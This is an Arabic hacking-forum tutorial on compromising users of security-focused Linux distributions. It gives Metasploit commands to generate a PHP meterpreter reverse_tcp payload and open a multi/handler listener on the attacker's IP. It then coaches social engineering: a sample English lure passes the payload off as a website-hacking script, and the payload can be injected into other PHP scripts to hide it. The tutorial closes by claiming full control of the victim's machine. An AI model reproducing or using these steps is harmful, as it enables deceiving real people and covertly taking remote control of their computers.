بسم الله الرحمن الرحيم
والصلاة والسلام على أشرف الخلق والمرسلين محمد وعلى آله وصحبه اجمعين
اليوم شباب لدينا احد دروس
[ دورة التوزيعات الأمنية ] على منتديات جيوش الهكر
درسنا اليوم بعنوان
[ اختراق احدى التوزيعات الأمنية باستخدام Windows XP ]
قد يستغرب البعض هذا العنوان فكما تعودنا نظام
XP هو ما يتم اختراقه باستخدام التوزيعات الأمنية
لكن فقط في الجيوش تنقلب الموزايين .
لقد سمعت من بعض الشباب الذي يستخدمون الباك تراك او غيره من التوزيعات الأمنية انه لا يمكن اختراقهم لان هذه التوزيعات هي لنكس ولنكس لا يمكن اختراقه .
ولكن هذا غير صحيح بل يمكن اختراق مستخدمي هذه التوزيعات وهذا ما سنشرحه اليوم
وايظا كون في كل شروحات الاختراق المتقدم يكون الضحية
[ المدعوس ] هو نظام
[ Windows ] ولكن اليوم سوف نعطي لهذا النظام فرصة للدفاع عن نفسه .
[ الفكرة ]
سوف نقوم بصناعة
[ Payload ] بصيغة
[ PHP ] ومن ثم استخدام القليل من
[ الهندسة الأجتماعية ] لاختراق جهاز الضحية
جيب توفر مشروع
[ Metasploit ] على جهاز
Windows
نبدا الشرح بعد :
[ بسم الله الرحمن الرحيم
]
اولا نقوم بتشغيل مشروع
[ Metasploit ]
ومن ثم ننفذ الاوامر التالي لانشاء
[ Payload ] من نوع
[ PHP ]
كود:
use payload/php/meterpreter/reverse_tcp
set LHOST "الايبي بتاعك"
set LPORT "بورت الاتصال العكسي
قم باستبدال البيانات المطلوبة بالأبيانات الصحيحة
الأن نقوم بتنفيذ الامر التالي لانتاج كود
[ PHP ] للبيلود
سوف تخرج لنا شاشة الـ
[ Metasploit ] الكود
قم بنسخ الكود ابتداءا من كلمة :
وانتهاءا بكلمة :
انسخ الكود بشكل كامل وضعه في ملف نصي جديد
قم بحفظ الملف بأي اسم تريده بصيغة
[ PHP ]
مثال :
الان نقوم بتشغيل التنصت على الأتصال الخارجي في الميتاسبلوت
وذلك عن طريق تنفيذ الاوامر التالية :
كود:
use multi/handler
set lport "بورت الأتصال العكسي"
set lhost "الأيبي بتاعك"
set payload php/meterpreter/reverse_tcp
ومن ثم نبدا التنصت باستخدام الأمر
نقوم الان باستخدام الـ
[ الهندسة الأجتماعية ] لارسال الـ
[ Payload ] الى الضحية وجلعه يشغله .
طبعا هنا عليك الأبداع فمثلا بما ان الـ
[ Payload ] من نوع
[ PHP ] حاول خداع الضحية بأخباره ان هذا الملف هو سكربت لأختراق المواقع .
مثال :
This PHP script will Allow you to to upload a file to any site that using linux server
just start the file using the command
php file.php
or
put it in your PHP server and start it
وانت حاول ان تخترع طرق من عندك لايهام الضحية بان هذا الملف سوف يساعده في اختراق موقع ما او جهاز ما .
والان على جهة الضحية وفي هذه الحالة سوف تكون احدى التوزيعات الأمنية
وفي الشرح استخدم توزيعه
[ BlackBuntu ]
سوف يقوم الضحية بتشغيل الملف بطريقتين
الأول
: ( باستخدام سطر الاوامر )
تنفيذ الامر التالي
:
الثانية
: ( باستخدام سيرفر )
سوف يقوم بوضع الملف في سيرفر المواقع المرفق في التوزيعه مثل :
Apache
وتشغيل الملف من المتصفح
في كلتا الحالتين سوف يتم الأختراق
تشغيل الملف :
باستخدام سطر الاوامر :
كما ترون لم يظهر للضحية اي شيء في سطر الأوامر بعد تشغيل الملف
يمكنك حقن كود الملف في اي سكربت
[ PHP ] لابعاد الشك
الان نذهب الى جهاز الهكر وفي هذه الحالة هو نظام
[ Windows XP ]
لنرى النتيجة وهي :
Game Over
كما ترون تم فتح الجلسة بنجاح والان انت تمتلك السيطرة على جهاز الضحية
no one is safe
اتمنى ان يعجبكم الشرح
والسلام عليكم ورحمة الله وبركاته
